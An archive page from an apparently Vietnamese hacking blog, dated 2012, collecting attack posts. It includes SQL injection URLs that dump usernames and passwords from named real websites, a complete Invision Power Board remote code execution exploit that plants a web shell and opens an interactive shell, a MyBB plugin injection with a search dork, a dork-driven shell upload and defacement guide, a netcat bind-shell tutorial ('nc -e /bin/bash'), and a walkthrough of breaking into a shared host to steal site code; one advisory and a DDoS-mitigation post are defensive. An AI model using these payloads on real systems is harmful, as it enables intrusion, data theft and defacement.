Home / Archived For 2012

Thứ Bảy, 1 tháng 12, 2012

6 Random Injections

6 Random Injections


1/

Mã:
http://www.elansystems.co.za/product-item.php?product_items_id=-11 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),3,group_concat(username,​0x3b,password),5,6,7,8,9,10 from users_tbl--



2/

Mã:
http://www.nbjm-sprayer.com/products.php?id=-1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,group_concat(username,0x3b,password),18,1​9,20,21,22,23 from user_table--

3/

Mã:
http://www.mcdonaldlawoffice.net/story.php?articleid=-8 UNION SELECT 1,2,group_concat(name,0x3b,password),4,5,6,7,8,9,10,11,12,13,14,15,16 from users--

4/

Mã:
http://localtime.biz/product.php?cat_id=-1 UNION SELECT 1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(email,0x3b,​pwd,0x3c,0x62,0x72,0x3e),4 from users--

5/

Mã:
http://www.eltee.de/kolumnen_id.php?id=-30175 UNION SELECT 1,2,3,4,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),6,7,8--

6/

Mã:
http://www.media4world.de/mini_d/list_art.php?shop=-5 UNION SELECT group_concat(username,0x3b,kwort,0x3b,admin,0x3c,0x62,0x72,0x3e) from user--
Pada Komentar
WordPress WP E-Commerce 3.8.9 SQL Injection / Cross Site Scripting

WordPress WP E-Commerce 3.8.9 SQL Injection / Cross Site Scripting 


WordPress WP E-Commerce 3.8.9 SQL Injection / Cross Site Scripting
Software: WP e-Commerce
Software Language: PHP
Version: 3.8.9 and below
Vendor Status: Vendor contacted
Release Date: 2012-11-12
Risk: High
 
 
 
1. General Overview
===================
During the security audit of WP E-Commerce plugin for WordPress CMS,
multiple vulnerabilities were discovered using DefenseCode ThunderScan
PHP web application source code security analysis platform.
More information about ThunderScan PHP is available at URL:
http://www.defensecode.com/subcategory/thunderscan-8
 
Detailed report for each vulnerability can be found in the following PDF
report:
http://www.defensecode.com/public/wp-e-commerce_security_audit_final_report.pdf
 
Report has been generated by ThunderScan PHP Web Application Source Code
Security Analysis.
 
 
2. Software Overview
===================
WP e-Commerce is a popular e-commerce plugin for WordPress. Users can
use it to to sell products, downloads or services online. It has more
than 2 Million downloads on wordpress.org.
 
Homepage:
http://wordpress.org/extend/plugins/wp-e-commerce/
http://getshopped.org/
 
 
3. Brief Vulnerability Description
==================================
During the security analysis, ThunderScan PHP discovered multiple SQL
Injection and Cross Site Scripting vulnerabilities in WP e-Commerce plugin.
 
3.1. SQL injection
File: wp-e-commerce\wpsc-includes\purchaselogs.class.php
Function: get_results($sql)
Variable: $_POST['view_purchlogs_by_status']
Called from (function line file):
get_purchlogs() 699 wp-e-commerce\wpsc-core\wpsc-deprecated.php
 
3.2 SQL injection
File: wp-e-commerce\wpsc-includes\purchaselogs.class.php
Function: get_results( $sql )
Variable: $_POST['view_purchlogs_by_status']
Called from (function line file):
get_purchlogs() 681 wp-e-commerce\wpsc-core\wpsc-deprecated.php
 
3.3 SQL injection
File: wp-e-commerce\wpsc-includes\purchaselogs.class.php
Function: get_results( $sql )
Variable: $_GET['view_purchlogs_by_status']
Called from (function line file):
get_purchlogs() 525 wp-e-commerce\wpsc-includes\purchaselogs.class.php
 
3.4 SQL injection
File: wp-e-commerce\wpsc-includes\purchaselogs.class.php
Function:  get_results( $sql )
Variable: $_GET['view_purchlogs_by_status']
Called from (function line file):
get_purchlogs() 543 wp-e-commerce\wpsc-includes\purchaselogs.class.php
 
3.5 SQL injection
File: wp-e-commerce\wpsc-includes\purchaselogs.class.php
Function:  get_results( $sql )
Variable: $_GET['view_purchlogs_by_status']
Called from (function line file):
get_purchlogs() 534 wp-e-commerce\wpsc-includes\purchaselogs.class.php
 
3.6 SQL injection
File: wp-e-commerce\wpsc-includes\purchaselogs.class.php
Function:  get_results( $sql )
Variable: $_POST['view_purchlogs_by_status']
Called from (function line file):
get_purchlogs() 689 wp-e-commerce\wpsc-core\wpsc-deprecated.php
 
3.7 Cross-Site Scripting
File: wp-e-commerce\wpsc-admin\includes\purchase-log-list-ta
ble-class.php
Function: echo ('<input type="hidden" name="m" value="' . $m . '" />')
Variable: $_REQUEST['m']
 
 
4. Solution
===========
Vendor resolved security issues in latest WP e-Commerce release. All
users are strongly advised to update WP e-Commerce plugin to the latest
available version 3.8.9.1.
 
# 1337day.com [2012-11-19]
Pada Komentar
Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution

Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution


<?php /* ---------------------------------------------------------------- Invision Power Board <= 3.3.4 "unserialize()" PHP Code Execution ---------------------------------------------------------------- author..............: Egidio Romano aka EgiX mail................: n0b0d13s[at]gmail[dot]com software link.......:


http://www.invisionpower.com/ +-------------------------------------------------------------------------+ | This proof of concept code was written for educational purpose only. | | Use it at your own risk. Author will be not responsible for any damage. | +-------------------------------------------------------------------------+ [-] Vulnerable code in IPSCookie::get() method defined in /admin/sources/base/core.php 4015. static public function get($name) 4016. { 4017. // Check internal data first 4018. if ( isset( self::$_cookiesSet[ $name ] ) ) 4019. { 4020. return self::$_cookiesSet[ $name ]; 4021. } 4022. else if ( isset( $_COOKIE[ipsRegistry::$settings['cookie_id'].$name] ) ) 4023. { 4024. $_value = $_COOKIE[ ipsRegistry::$settings['cookie_id'].$name ]; 4025. 4026. if ( substr( $_value, 0, 2 ) == 'a:' ) 4027. { 4028. return unserialize( stripslashes( urldecode( $_value ) ) ); 4029. } The vulnerability is caused due to this method unserialize user input passed through cookies without a proper sanitization. The only one check is done at line 4026, where is controlled that the serialized string starts with 'a:', but this is not sufficient to prevent a "PHP Object Injection" because an attacker may send a serialized string which represents an array of objects. This can be exploited to execute arbitrary PHP code via the "__destruct()" method of the "dbMain" class, which calls the "writeDebugLog" method to write debug info into a file. PHP code may be injected only through the $_SERVER['QUERY_STRING'] variable, for this reason successful exploitation of this vulnerability requires short_open_tag to be enabled. [-] Disclosure timeline: [21/10/2012] - Vulnerability discovered [23/10/2012] - Vendor notified [25/10/2012] - Patch released: http://community.invisionpower.com/t...ecurity-update [25/10/2012] - CVE number requested [29/10/2012] - Assigned CVE-2012-5692 [31/10/2012] - Public disclosure */ error_reporting(0); set_time_limit(0); ini_set('default_socket_timeout', 5); function http_send($host, $packet) { if (!($sock = fsockopen($host, 80))) die("\n[-] No response from {$host}:80\n"); fputs($sock, $packet); return stream_get_contents($sock); } print "\n+---------------------------------------------------------------------+"; print "\n| Invision Power Board <= 3.3.4 Remote Code Execution Exploit by EgiX |"; print "\n+---------------------------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] <host> <path>\n"; print "\nExample....: php $argv[0] localhost /"; print "\nExample....: php $argv[0] localhost /ipb/\n"; die(); } list($host, $path) = array($argv[1], $argv[2]); $packet = "GET {$path}index.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; $_prefix = preg_match('/Cookie: (.+)session/', http_send($host, $packet), $m) ? $m[1] : ''; class db_driver_mysql { public $obj = array('use_debug_log' => 1, 'debug_log' => 'cache/sh.php'); } $payload = urlencode(serialize(array(new db_driver_mysql))); $phpcode = '<?error_reporting(0);print(___);passthru(base64_d ecode($_SERVER[HTTP_CMD]));die;?>'; $packet = "GET {$path}index.php?{$phpcode} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: {$_prefix}member_id={$payload}\r\n"; $packet .= "Connection: close\r\n\r\n"; http_send($host, $packet); $packet = "GET {$path}cache/sh.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; if (preg_match('/<\?error/', http_send($host, $packet))) die("\n[-] short_open_tag disabled!\n"); while(1) { print "\nipb-shell# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; $response = http_send($host, sprintf($packet, base64_encode($cmd))); preg_match('/___(.*)/s', $response, $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); }

Pada Komentar
MyBB Profile Albums Plugin 0.9 (albums.php, album parameter) SQL Injection

MyBB Profile Albums Plugin 0.9 (albums.php, album parameter) SQL Injection

Bug cho forum sài MyBB với cái Albums plugin version 0.9
Tut: 
1. Tạo cái user trên forum victim.
2. Tạo cái Album rồi upload hình lên.
-> 2 bước trên để có được cái ID user và ID của album sử dụng cho bước thứ 3.


3. Điền ID user vào cái Valid_ID và điền cái ID của album vào cái Valid_album_ID rồi thêm lệnh SQL khai thác ở cuối.
link: .../albums.php?action=editimage&image=[Vaild_ID]&album=[Vaild_album_ID][SQLi]
# Exploit Title: Profile Albums MyBB plugin SQL Injection 0day
# Google Dork: inurl:albums.php intext:"powered by Mybb"
# Date: 14.10.2012
# Exploit Author: Th3FreakPony
# Software Link: http://mods.mybb.com/view/profilealbums
# Version: 0.9
# Tested on: Linux.
----------------------------------------------

The vulnerabillity exist within albums.php :

input['album'];
/*Line 86*/ $query_add_breadcrumb = $db->simple_select("albums", "*", "aid='".$aid."'");
?>

/albums.php?action=editimage&image=[Vaild_ID]&album=[Vaild_album_ID][SQLi]

(You need to create a new account && upload album and images)
----------------------------------------------
Image : http://i.imgur.com/yeAx0.png


Follow: https://twitter.com/PonyBlaze


Nguồn: http://junookyo.blogspot.com/2012/11/mybb-profile-albums-plugin-09-albumsphp.html
Pada Komentar

Puzzles to Test your Hacking Skills


Hello Friends,
Many readers of my site want to be a hacker.... and till then of course you have learnt many things.... So now its time to check your hacking Skills.

Here i am providing you link of some sites where you can test your hacking skills just by solving Puzzles.. Its really very interesting and i am sure by solving these puzzles you will get some more knowledge also. In these sites, the Puzzles are arranges in many levels from easy to hard, So how much you are a gud hacker, depends on how many levels you do clear.

So I m telling here link of 4 Top sites. Try it, these are Fun and Challenging :) And share your Results and Experience here :)

  1. http://www.try2hack.nl/
  2. http://www.hack-test.com/index.htm
  3. http://www.elfqrin.com/hack/hackertest.html
  4. http://www.hackthissite.org/

Pada Komentar
"Testing Image collection" shell and files upload vulnrablity

"Testing Image collection" shell and files upload vulnrablity

Dorks : inurl:"modules/filemanagermodule/actions/?picker.php??id=0"
           intitle:"Testing Image Collections"

Goto Google or Bing and Type Dork  inurl:"modules/filemanagermodule/actions/?picker.php??id=0" or intitle:"Testing Image Collections"
now see search results in google or bing search ..
select any site from search results and look for upload option

Now select your shell or deface page and upload it

To view your upload shell or deface go to:
http://website.com/files/yourfilehere  or
http://websites.com/path/yourfilehere

Example -
http://www.dogandduckfc.com/newsite/modules/filemanagermodule/actions/picker.php?id=0

Nguồn: http://junookyo.blogspot.com/2012/12/testing-image-collection-shell-and.html
Pada Komentar

CK Hash Cracker


CK Hash Cracker | Juno_okyo's Blog

CK_HASH_CRACKER VERSION 3.0 Download Link: Click Here

__Change Log__
Hash Identifier Modified


Online Database Checker Bug Fixed And Works Faster
Offline Database Search Engine Modified
Rainbow Table Algorithm Added
How To Add Additional Database Release?

After Installation with the Default Settings, A Folder Named CK_Hash_Cracker Verion 3.0 will be Created in Root Directory/Program Files, which is mostly C: Drive, So that path will Be C:\Program Files\CK_Hash_Cracker-Version 3.0; under This Folder There Are Two Folders Named "Brute" And "DatabaseConnector"

Files Under "Brute" Folder Is Used For BruteForcing, Make Sure If You Place Additional WordList, You Do Not Have Duplicate Words, Otherwise It will just increase the Time. You Can Place Files With Any Name Under This Folder, It Will Work Fine, until the Files Are in Readable Format

Files Under "DatabaseConnector" Are The Offline Database, So For Any Database Releases, After Downloading Databases, Put The Files Under "DatabaseConnector" Folder And Thats It, The Tool Will Automatically Upgrade The Database.

Its Has A Self-Installer, So To Install, Just Run The Setup file. To Uninstall, You Can Remove It From Control Panel Or From The Self Uninstaller.

If You Get Error At Run-Time, Probably You Do Not Have The Microsoft Visual C++ 2008 Installed, The Application doesn't need Python To Run, But It Needs The Run-Time Components. You Get The Download Packages From Here:

For Windows 32 bit: Click Here

For Windows 64 bit: Click Here

And Then Try Running The Application.CK_Hash_Cracker (Version 3.0) Download Link: Click Here

Nguồn: http://junookyo.blogspot.com/2012/12/ck-hash-cracker.html
Pada Komentar

Thứ Sáu, 30 tháng 11, 2012

Bug script WordPress SQL Injection version 3.1.3

Exploits links here

Pada Komentar
[Tutorial]Backconnect with netcat

[Tutorial]Backconnect with netcat

1.Download

netcat windows-http://anonym.to/?http://joncraton.o...at-for-windows
nc to upload with shell-http://www.multiupload.nl/TOBD6TAOXE

2.Upload nc with shell

[IMG]
3.set chmod 777 for nc



[IMG]
4.run command ./nc -vv -l -p [port] -e /bin/bash at shell


5.open cmd direct to where nc save like this cd c:\
and run this command nc -vv [ip target] [port]



[IMG]

6.now you have back connect it

[IMG]
Pada Komentar

Chủ Nhật, 25 tháng 11, 2012

share code wapgamevn.com, taigamemienphi.info, vinavip.mobi

share code wapgamevn.com, taigamemienphi.info, vinavip.mobi

Pada Komentar

Thứ Tư, 21 tháng 11, 2012

Nghịch ChangUonDyU Chatbox[ Dành cho Newbie] Phần 2

_Nghịch ChangUonDyU Chatbox[ Dành cho Newbie] Phần 1
[+]_./http://www.tmt-today.com/2012/10/nghich-changuondyu-chatbox-danh-cho.html

_Nghịch ChangUonDyU Chatbox[ Dành cho Newbie] Phần 2


_ Bài này mình hướng dẫn bypass chbox với 2 giá trị là TRUE ( check key and domain)
$config['check_domain_reffer'] = true; //
$config['check_chatbox_key'] = true; // 
Vẫn tiếp tục với code cũ . view source lấy link chatbox
var chatboxkey = 'c75c1744f51255bcc02f82604f8f8447';
var huid = '222';
var hgroupid = '2';
var huser = "%3Cfont%20color%3D%22white%22%3E%3Cb%3EChymToNhat Ho%3C%2Fb%3E%3C%2Ffont%3E";



giá trị khi config TRUE 


Giờ ta sửa file host để khi $config['check_domain_reffer'] = true; // <-- sẽ trả về giá trị đúng với khi admin config

Tạo folder @STH

các bạn đã thấy gì chưa :d , như vậy chỉ cần biết đúng key thì chúng ta sẽ chát mà ko cần login

vậy cách get key như thế nào zô VNH mà xem tut nhé các bạn trẻ 

And tut ...By TMT-Vnhgroup
Pada Komentar

[TUT] Local Cơ bản cho newbie

_Tiếp ngày buồn , bài này chỉ hướng dẫn các NB về cách được gọi là mấy bác nói là "HACK" , ở đây mình chỉ nói đến mức cực cơ bản nhưng chủ yếu là tư duy của các bạn thôi ....




_ Vậy muốn hack thì làm gì ? Mục đích để làm gì ? , ở đây mục đích của mình là lấy CODE mang về chạy làm web thôi , hum bữa mình định làm cái web "Thuê Xe Du Lịch" ,chắc cũng chỉ biết lên google tìm từ khóa"Thuê Xe Du Lịch"
_Mình thấy site http://thuexedulich.com.vn/ khá là đẹp  , Mục đích đã rõ giờ việc đầu tiên là xem nó làm bằng mã nguồn gì , xem đi xem lại đây là mã nguồn do CTY abc gì đó viết chả biết  , tiếp theo là tìm xem server nó có nhiều web để khai thác lỗi không ( reverser ip)

_ Chúng ta có 41 websites trên 112.213.86.157 Server 112.213.86.157, Ngon 

Ngon thiệt ấy , Giờ check xem từng sirte 1 một , với tất cả các THỦ ĐOẠN ( Đoán pass,SQL injection.vvvv)
_Mình check từ dưới Check lên , đoán bừa pass admin/12345 ai zè nó thế này đây @@

_Đúng là Việt Nam có khác  , giờ công việc tiếp theo là Upload Shell ,cách up shell thì khá nhiều ( thêm gif89 zô source ,change file.php.gif vvv...) , giờ tìm chỗ cho nó đục lỗ nào..."Sản Phẩm" <-- chỗ này cho phép upload ảnh đây , save con shell tmt.php.gif up thử xem thế nào

_Giờ chạy link xem
 
_haha 1 con shell to đùng với đống info sau
Safe_mod: OFF - PHP version: 5.2.17 - cURL: ON - MySQL: ON - MSSQL: OFF - PostgreSQL: OFF - Oracle: OFF
Disable functions : exec,passthru,shell_exec,system,proc_open,popen,cu rl_exec,curl_multi_exec,parse_ini_file,show_source
Uname -a: Linux vps86157.vn 2.6.18-238.el5 #1 SMP Thu Jan 13 16:24:47 EST 2011 i686
Server: - id: 48(apache) - uid=48 (apache) gid=48(apache) 
_ Việc tiếp theo là tìm PATH của nó "cat /etc/pass" sẽ ra 1 đống , Với quyền apache này thì cách local khá đơn giản với lại thằng chủ server cài đặt koloxo lên mức độ bảo mật kém


_Local id apache ở đây
http://www.tmt-today.com/2011/08/local-id-apache.html


_Đến đây là quá đơn giản rồi ko cần phải viết tiếp nữa...chúc các NB lấy đc nhiều code 
Pada Komentar

Thứ Hai, 19 tháng 11, 2012

3 cách phòng chống DDOS cho trang web của bạn

3 cách phòng chống DDOS cho trang web của bạn


Tấn công DDOS hay còn được gọi tấn công từ chối dịch vụ đơn giản được hiểu là tạo ra 1 lượt truy cập ảo ồ ạt vào một địa chỉ website tại cùng một thời điểm nào đó đã định sẵn nhằm “đánh sập” máy chủ lưu trữ khiến nó chạy chậm hoặc không thể chạy được nữa.


 Thật sự thì không có phương pháp chống DDOS hiệu quả nhất nhưng nếu với mức độ nhỏ và mang tính không chuyên khi sử dụng các phần mềm được lập trình sẵn ở quy mô nhỏ lẻ thì ta hoàn toàn có thể chủ động phòng chống.
ddos-attack.gif

Cách 1: Chống iframe.

Đây  là phương pháp được xem là thô sơ nhất. Kẻ tấn công sẽ mượn 1 website có lượt truy cập lớn nào đó chèn các iframe hướng về website cần đánh rồi cho chạy lệnh refresh (tải lại) nhiều lần hoặc họ viết sẵn 1 tập tin flash với công dụng tương tự rồi đặt lên website và khi người dùng truy cập vào website này thì họ vô tình bất đắc dĩ trở thành người tấn công website kia.

Với hình thức tấn công kiểu như thế này bạn hoàn toàn có thể chống lại bằng cách chèn 1 đoạn mã Javascript chống chèn iframe từ các website khác đến website của bạn.
1.<script language="JavaScript">
2.if (top.location != self.location)
3.{top.location = self.location}
4.</script>

Bạn có thể tại đoạn mã trên tại: http://www.mediafire.com/?weephu8sgdphwel 

Cách 2: Chống tải lại trang web có ác ý

Một hình thức tấn công khác nữa là dùng phím F5 liên tục có chủ ý, hoặc dùng một phần mềm được lập trình sẵn với công dụng tương tự (tải lại trang web liên tục sau những khoảng thời gian định sẵn) của một nhóm người làm cho trang web của bạn tải lại (reload) liên tục. Việc này có thể làm tốn băng thông của trang web hoặc làm trang web chạy chậm vì những kết nối ảo.


Với cách thức tấn công này thì nếu dùng cách một để chống coi như là vô ích. Nếu bạn bị tấn công như thế này thì bạn hãy thiết lập tập tin .htaccess với nội dung:
1.RewriteEngine on
2.RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?domain.com [NC]
3.RewriteRule !antiddos.phtml http://www.domain.com/antiddos.phtml?%{REQUEST_URI} [QSA]

Sau đó tạo thêm một một tập tin antiddos.phtml có nội dung
1.<?
2.$text $HTTP_SERVER_VARS['QUERY_STRING'];
3.$text = preg_replace("#php\&#si",'php?',$text);
4.echo('<center><a href=http://www.domain.com/?'.$text.'><font color=red size=5 face=Monotype>[CLICK HERE TO ENTER]</font></a</center>');
5.?>

Sau đó bạn upload 2 tập tin này lên thư mục gốc của website. Như vậy là mỗi khi truy cập vào website, nếu lần đầu tiên thì sẽ có thông báo yêu cầu nhấn chuột thì bạn mới vào được website và ở các lần sau sẽ không có và các phần mềm DDOS được lập trình sẽ bị chặn lại ở bước click chuột để vào trang web ở lần truy cập đầu tiên nên việc tải lại trang web chỉ đơn thuần là 1 trang HTML nhỏ không ảnh hưởng nhiều đến hệ thống.


Bạn có thể đoạn mã trên tại: http://www.mediafire.com/?c41hmfeod3qxii8

Chú ý là cách này chỉ áp dụng cho website đang sử dụng server chạy trên nền Linux.

Cách 3: Giới hạn số kết nối website tại một thời điểm

Khi một khách truy cập vào website thì sẽ tạo ra một truy vấn kết nối với cơ sở dữ liệu (CSDL) lấy thông tin và trả về thông qua hiển thị của website. Mỗi máy chủ sẽ có phép bao nhiêu truy vấn kết nối là hạn định và khi vượt quá hạn mức này thì việc truy cập sẽ khó khăn hoặc không thể truy xuất được. Các tin tặc lợi dụng vào điều này để tạo ra các truy cập ảo, kết nối ảo thông qua proxy hay chuyên nghiệp hơn là mạng botnet nhằm đánh sập trang web và phá hỏng CSDL website. Để hạn chế điều này ta có thể chủ động giới hạn số kết nối truy vấn tin (lượt truy cập) cùng một thời điểm.
Bạn thêm dòng đoạn mã sau vào trang chủ của website.
01.function server_busy($numer) {
02.if (THIS_IS == 'WEBSITE' && PHP_OS == 'Linux' and @file_exists '/proc/loadavg' and $filestuff = @file_get_contents '/proc/loadavg' )) {
03.$loadavg explode ' '$filestuff );
04.if (trim ( $loadavg [0] ) > $numer) {
05.print '<meta http-equiv="content-type" content="text/html; charset=UTF-8" />';
06.print 'Lượng truy cập đang quá tải, mời bạn quay lại sau vài phút.';
07.exit ( 0 );
08.}
09.}
10.}
11.$srv = server_busy ( 1000 ); // 1000 là số người truy cập tại 1 thời điểm

Đoạn mã trên có ý nghĩa cho phép 1000 người online trên website tại một thời điểm. Nếu vượt qua số 1000 thì khách truy cập sẽ nhận được thông báo: Lượng truy cập đang quá tải. Mời bạn quay lại sau vài phút.

Bạn có thể tải đoạn mã trên tại: http://www.mediafire.com/?exsl6hpd37eqnk3

Chú ý đoạn mã này chỉ  áp dụng cho ngôn ngữ lập trình PHP.

Đây chỉ là ba cách chống đỡ mang tính chất giản đơn áp dụng cho những đợt tấn công nhỏ lẻ. Để website của mình hoạt động tốt và có sức chống chọi lại những đợt tấn công quy mô lớn bạn nên:

- Tối ưu hóa website ví dụ bạn có thể xây dựng bộ nhớ đệm (cache) cho website để nhằm giảm số kết nối vào CSDL.

- Lựa chọn nhà cung cấp hosting lưu trữ web tốt để có những đối phó với những đợt tấn công.
Pada Komentar
Đăng ký: Bài đăng (Atom)